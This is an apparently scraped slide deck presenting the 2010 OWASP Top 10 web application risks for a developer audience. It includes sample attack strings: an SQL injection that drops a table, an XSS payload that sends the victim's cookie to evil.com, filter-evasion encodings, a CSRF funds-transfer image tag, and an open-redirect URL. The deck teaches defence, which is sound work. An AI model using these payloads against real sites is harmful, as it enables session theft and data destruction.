Per Josefsson OWASP Topp Tio 20110825

Document Sample
Per Josefsson OWASP Topp Tio 20110825 Powered By Docstoc
					OWASP top 10 - Agenda

Background
Risk based
Top 10 items 1 – 6
Live demo
Top 10 items 7 – 10
OWASP resources




                        OWASP
The OWASP Guide




            OWASP
Threat   Attack      Weakness      Weakness       Technical      Business
Agent    Vector      Prevalence   Detectability    Impact         Impact
          Easy       Widespread       Easy         Severe
  ?      Average      Common        Average       Moderate            ?
         Difficult   Uncommon       Difficult      Minor




                                                              OWASP
Warning

Risk analysis
  Insiders
Architecture
  Modular
  Clarity
SDLC
  Knowledge
  Predictability




                    OWASP
Top 10 - 2010

1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security missconfiguration
7. Insecure cryptograpic storage
8. Failure to restrict URL access
9. Insufficient transoport layer protection
10. Unvalidated redirects and forwards

                                            OWASP
A1 – Injection




                        DB
    Client       Appl

                        Shell


                        Pgm       CPU




                                OWASP
 A1 – Injection




String query = "SELECT * FROM accnts WHERE ID='" +
request.getParameter("id") +"'";


id="foo"
SELECT * FROM accnts WHERE ID='foo';

id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';


                                             OWASP
A2 - Cross site scripting (XSS)




    Browser
                   Appl     DB



    Browser




                                  OWASP
 A2 - Cross site scripting (XSS)




(String) page += "<input name='cc' type='TEXT'
value='" + request.getParameter("CC") + "'>";

CC=“123456789"
<input name='cc' value='123456789'>

CC=123456789"><script>window.location=http://evil.com?
x=document.cookie</script>
<input name='cc' value='123456789“><script>
window.location=http://evil.com?x=document.cookie
</script>'>
                                             OWASP
A2 - Cross site scripting (XSS)




                                          <        &#x003c
<img src=http://site.com onmoseover=      %3C      &#X3c
<body onload=                             &lt      &#x3C
<IMG SRC=j&#X41vascript:alert('test2')>   &lt;     000003C;
                                          &LT      \x3c
                                          &LT;     \x3C
                                          &#60     \u003c
                                          &#060    \u003C
                                          &#60;




                                                  OWASP
A3 - Broken authentication and session mngmnt




Unpredictable passwords, sessions-ID, security-
 questions
No sessions-id/credentials i URL
Avoid session-fixation
Time out of sessions & logout buttons
Different sessions id outside/inside TLS
No clear text passwords
                                        OWASP
 A4 - Insecure direct object references




<SELECT name=period>
   <OPTION>2010q1</OPTION>
   <OPTION>2011q2</OPTION>
</SELECT>

period=2011q2


period=2011q3



                                      OWASP
 A5 - Cross-site request forgery (CSRF)




<img src="http://example.com/transferFunds?amount=1500
&destinationAccount=attackersAcct#“width="0"
height="0" />


<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
   <input type="hidden" name="sp" value="8109"/>
</form>



                                             OWASP
A6 - Security missconfiguration




Patching
  OS
  Application
  Frameworks / libraries
Disable unnecessary services
Stack traces
Configuration

                                  OWASP
A7 - Insecure cryptographig storage




Keep track on sensitive data
Password one-way-hashed & salted
Password/Key management
  TLS key pass phrase
  M2M lösenord (obfuscation)




                                      OWASP
A8 - Failure to restrict URL access




/user/getAccounts
/admin/getAccounts




                                      OWASP
A9 - Insufficient transport layer protection




Use SSL/TLS
No mixed content
Use secure cookies

Example FireSheep exploits poor solutions



                                        OWASP
A10 - Unvalidated redirects and forwards




http://www.vuln.com/redir.asp?=http://www.lin
 ks.com

http://%77%77%77%2E%67%6F%6F%67%6C
 %65%2E%63%6F%6D




                                           OWASP
OWASP resurser

OWASP Secure Software Contract Annex
OWASP Developer’s Guide
OWASP Enterprise Security API (ESAPI)
OWASP Software Assurance Maturity Model
 (SAMM)
OWASP WebGoat




                                     OWASP

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:0
posted:9/16/2012
language:Unknown
pages:19